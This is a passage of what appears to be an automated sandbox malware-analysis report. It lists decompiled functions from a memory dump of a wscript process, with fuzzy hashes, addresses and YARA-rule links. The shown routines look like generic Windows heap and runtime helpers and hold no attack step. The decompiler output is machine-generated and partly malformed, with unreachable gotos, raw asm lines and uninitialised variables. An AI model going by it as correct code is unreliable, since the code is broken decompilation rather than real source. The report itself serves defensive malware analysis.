Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d54ae3d8e4f1610648d83d0568c199955c20dfea924f24b748d064da2b22b8cf
Instruction ID: c18bbc244681d9bade9bc4326fb3f80e218fbd2270e324d3dab9d294caf9a18f
Opcode Fuzzy Hash: d54ae3d8e4f1610648d83d0568c199955c20dfea924f24b748d064da2b22b8cf
Instruction Fuzzy Hash: 1DF0A72E53A3854ADF325F24B90AFE62F96EF85314B192485F56167640CA788D83CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0598927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0598927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L05964620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0598FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E059892C6(_t11, _t14);
				}
				return _t11;
			}

0x05989295
0x05989299
0x0598929f
0x059892aa
0x059892ad
0x059892ae
0x059892af
0x059892b0
0x059892b4
0x059892bb
0x059892bb
0x059892c5

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 83dc177d5b430f74e81d0e4690e6a39e332214ba29c46160fefecd683322ec46
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 06E065323405406BD711AF55DCC4B67765DAFC2725F044079F5055E242C6E5E90987A0

Uniqueness

Uniqueness Score: -1.00%

Function 05A18CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05A18CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x5a3d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E05967D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0598B640(E05989AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05a18ce5
0x05a18ced
0x05a18cf0
0x05a18cfb
0x05a18d0d
0x05a18cfd
0x05a18d06
0x05a18d06
0x05a18d18
0x05a18d19
0x05a18d1b
0x05a18d20
0x05a18d33

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69c535c2289755751ad22bf140967bac206b91ec52d6d5eea7fcf5bc8c0b950a
Instruction ID: fabead8f7c9be44bd6c17bb5dcb338ca8980af4a2236bc983a8dbe0008292d67
Opcode Fuzzy Hash: 69c535c2289755751ad22bf140967bac206b91ec52d6d5eea7fcf5bc8c0b950a
Instruction Fuzzy Hash: A7F08270A04209AFDB04EBA8D94AEAE77B4EF48244F140199F916EB290EA34E900C758

Uniqueness

Uniqueness Score: -1.00%

Function 0596746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0596746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0595EB70(__ecx, 0x5a379a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E059895D0();
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0596746d
0x0596746d
0x0596746d
0x05967471
0x05967488
0x059af92d
0x0596748e
0x05967491
0x05967495
0x059af937
0x059af93a
0x059af94e
0x059af953
0x059af956
0x059af956
0x05967495
0x00000000
0x05967488
0x05967473
0x05967478
0x0596747d
0x05967481
0x00000000
0x05967481
0x0596747d
0x0596747a
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31927d96e2a473af4c664eab9bd745eaff4ca49f0a782dc1c7d0d2a69eee637b
Instruction ID: 53f3c0a44d30ceae49323ef400c0274e2b6ce8ce5cfdd814dc6a5089ab568a9a
Opcode Fuzzy Hash: 31927d96e2a473af4c664eab9bd745eaff4ca49f0a782dc1c7d0d2a69eee637b
Instruction Fuzzy Hash: CFF0BE35A14144BACF41DBF8C848F79BBA7FF44358F041A55D852AB160F725E8088796

Uniqueness

Uniqueness Score: -1.00%

Function 05944F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05944F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E05A188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0596C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x5921030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x05944f2e
0x05944f34
0x05944f38
0x059a0b85
0x059a0b85
0x059a0b89
0x059a0b9a
0x059a0b9a
0x059a0b9f
0x00000000
0x059a0b9f
0x059a0b94
0x059a0b98
0x00000000
0x00000000
0x00000000
0x059a0b98
0x05944f3e
0x05944f48
0x00000000
0x05944f6e
0x00000000
0x05944f70

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20854661ad9e3210da9b2673debdf4a231e07e1fdf00cb795f38d0d8f5eb93e
Instruction ID: 289272540efd5b9f79f83dbfa1c47c13302c9413a92f76031859f8cb372bddbe
Opcode Fuzzy Hash: b20854661ad9e3210da9b2673debdf4a231e07e1fdf00cb795f38d0d8f5eb93e
Instruction Fuzzy Hash: ABF0BE339256948FDB60CB18C648F32B7EDBB007B8F044464D40687920C724EC48C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 05A18B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05A18B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x5a3d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E05967D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0598B640(E05989AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05a18b67
0x05a18b6f
0x05a18b72
0x05a18b7d
0x05a18b8f
0x05a18b7f
0x05a18b88
0x05a18b88
0x05a18b9a
0x05a18b9b
0x05a18b9d
0x05a18ba2
0x05a18bb5

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20da0367d6151208387207278298ce7bf57ada88de073ab53a96e2b91017b0bf
Instruction ID: 01a7f39dc1cddac72c358fd711ce79b92fc053c30c1beceb7a03fb2838a84d78
Opcode Fuzzy Hash: 20da0367d6151208387207278298ce7bf57ada88de073ab53a96e2b91017b0bf
Instruction Fuzzy Hash: 1CF089B0B142599BDB00EBA4D946E7E77B4EF44304F040459B905DB390EB34E901C758

Uniqueness

Uniqueness Score: -1.00%

Function 0597A44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0597A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x5a37b9c; // 0x0
				_t15 = __ecx;
				_t16 = L05964620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0598FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0597a44b
0x0597a453
0x0597a472
0x0597a476
0x00000000
0x0597a493
0x0597a47a
0x0597a47f
0x0597a486
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a8b5d31184aff74b819fe30bdcb88355cd46b5b71358c7bc7fd73204b8f6bb
Instruction ID: 9a2144f6694a94c9bcc983d4ce6a8aa35062e9b955f2c2e17424c6d0c97a8704
Opcode Fuzzy Hash: f8a8b5d31184aff74b819fe30bdcb88355cd46b5b71358c7bc7fd73204b8f6bb
Instruction Fuzzy Hash: 1AE0D872B01421ABD3119F59FC44F6B73ADEBD5651F094435F505C7210DA29ED02C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0594F358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0594F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0597F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L05964620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0594f35d
0x0594f361
0x0594f367
0x0594f372
0x0594f38c
0x0594f38c
0x0594f394

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 7a3c0645563ac8b723d626271e041b46c596e1a2369249d3c4437002027de402
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 36E0D832A40118BBCB21A6D99D05F5BBBACEB84BA0F000156B904D7150D560AD00D6D0

Uniqueness

Uniqueness Score: -1.00%

Function 0595FF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0595FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x59211a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E05A188F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E05960050(_t14);
				}
			}

0x0595ff66
0x0595ff6b
0x00000000
0x0595ff8f
0x00000000
0x0595ff8f

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d797802a42bdeb1a101a5b74104611edf9962dd66507924da60ab40eb4f02411
Instruction ID: 4ed99cdba023183ee30e3f9554aa0ffac43e0ecbe8b5553ea550e61581ef9470
Opcode Fuzzy Hash: d797802a42bdeb1a101a5b74104611edf9962dd66507924da60ab40eb4f02411
Instruction Fuzzy Hash: F6E0DFF06092849FD734DB52D384F253BAEAB42731F19841DFC084B901C621E8A0C31A

Uniqueness

Uniqueness Score: -1.00%

Function 059D41E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E059D41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x5a208f0);
				_t5 = E0599D08C(__ebx, __edi, __esi);
				if( *0x5a387ec == 0) {
					E0595EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x5a387ec == 0) {
						 *0x5a387f0 = 0x5a387ec;
						 *0x5a387ec = 0x5a387ec;
						 *0x5a387e8 = 0x5a387e4;
						 *0x5a387e4 = 0x5a387e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L059D4248();
				}
				return E0599D0D1(_t5);
			}

0x059d41e8
0x059d41ea
0x059d41ef
0x059d41fb
0x059d4206
0x059d420b
0x059d4216
0x059d421d
0x059d4222
0x059d422c
0x059d4231
0x059d4231
0x059d4236
0x059d423d
0x059d423d
0x059d4247

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c426b3fdc105098095dfd5a6000bf7883161e1dfc355cd0b213a37aaf79f4ec
Instruction ID: 2c435b87fecb665d038671e1f556fb66b63750bc098a35e770f838d74663db0f
Opcode Fuzzy Hash: 1c426b3fdc105098095dfd5a6000bf7883161e1dfc355cd0b213a37aaf79f4ec
Instruction Fuzzy Hash: 9FF01C74527702DFCF60DFA8994AB187EB6F784328F40815AF108A7284CB786546CF11

Uniqueness

Uniqueness Score: -1.00%

Function 059FD380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E059FD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0594E8B0(__ecx, _a4, 0xfff);
					L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x059fd38a
0x059fd39b
0x059fd3b1
0x00000000
0x059fd3b6
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 01d6e136aa78a7033e27ae0c7281b3b28a394193846d06d31d871fd4b16ba6b4
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 0CE08C31280204ABDB22AA44CC00F697A1AEB807A4F104431BF085A690C6B5AC91DBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0597A185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0597A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x5a367e4 >= 0xa) {
					if(_t5 < 0x5a36800 || _t5 >= 0x5a36900) {
						return L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E05960010(0x5a367e0, _t5);
				}
			}

0x0597a190
0x0597a1a6
0x0597a1c2
0x00000000
0x00000000
0x00000000
0x0597a192
0x0597a192
0x0597a19f
0x0597a19f

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6880e436ff1e2d4f804f3e1741efcce002cef4e8ff389894ed4c34024659a0d5
Instruction ID: 2f36a3f673b4afe1c00d606741add9e6840e4a983f11d4da898a7a5e8b7baedd
Opcode Fuzzy Hash: 6880e436ff1e2d4f804f3e1741efcce002cef4e8ff389894ed4c34024659a0d5
Instruction Fuzzy Hash: 0BD02B312340043ADB1C93508E9AF292722E7C4708FF0084EF1030B590EE5098D4C108

Uniqueness

Uniqueness Score: -1.00%

Function 059716E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E059716E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E05971710(0x5a367e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L05964620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x059716e8
0x059716ef
0x059716f3
0x059716fe
0x00000000
0x05971700
0x0597170d
0x0597170d
0x059716f2
0x059716f2
0x059716f2
0x059716f2

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c1e2bc4b840f4f1b02b2050ba95b6e05e5448d73fc0abb1014a20df50a69937
Instruction ID: 66f440725ce169c86e2bbd66aeec5497ba6062e81b88a3018d270cabb18c905f
Opcode Fuzzy Hash: 6c1e2bc4b840f4f1b02b2050ba95b6e05e5448d73fc0abb1014a20df50a69937
Instruction Fuzzy Hash: D4D0A971200200A3DE2D5B10D898B15226AEBC0B86F3800AEF20B4A8C0CFA0ECA2F04C

Uniqueness

Uniqueness Score: -1.00%

Function 059C53CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E059C53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0595EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x059c53ca
0x059c53ce
0x059c53d9
0x059c53de
0x059c53e1
0x059c53e1
0x059c53e6
0x059c53f3
0x00000000
0x059c53f8
0x059c53fb

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 31e187ed6810d19c803c78e9ed76033114784c306f637de1a7c92ce744a8f6fa
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: E8E0EC71A54684DBCF12DF99CA54F5EBBF9FB84B40F190498A4095B661C665BD00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 059735A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E059735A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0595EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x059735a1
0x059735a1
0x059735a5
0x059735ab
0x059735ab
0x059735b5
0x00000000
0x059735c1
0x059735b7

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: be6127285ba8583c7cef99ef845fcdc7ae854ef1ac7f9b373511d9e7269a7bea
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 55D0A9316051889ADB01EB10C218B6C33BBBB0021AF5828AB840A06852E33A4A1EE700

Uniqueness

Uniqueness Score: -1.00%

Function 0595AAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0595AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0595aab6
0x0595aabb
0x059aa442
0x00000000
0x059aa448
0x059aa454
0x059aa454
0x0595aac1
0x0595aac1
0x0595aac6
0x0595aac6

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: c565c5f924506e4c5ed07bea5322faeeffd1395ccbee40ad2e7a9bbafa66627b
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: A8D0E935352E80CFD616CB1DC564B1573E9BB44B45FC50590F901CB761E62CD954CA14

Uniqueness

Uniqueness Score: -1.00%

Function 059CA537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E059CA537(intOrPtr _a4, intOrPtr _a8) {

				return L05968E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x059ca553

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 9eedd35ef7ce77092a2fec65ba6782fbf81930abb074e55088fe938f230d37ac
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 45C01232180248BBCB126E81CC00F067B6AEB94B60F008010BA480A5608632E970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 0594DB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0594DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L05964620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0594db4d
0x0594db54
0x0594db5f
0x0594db56
0x0594db56
0x0594db5c
0x0594db5c

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

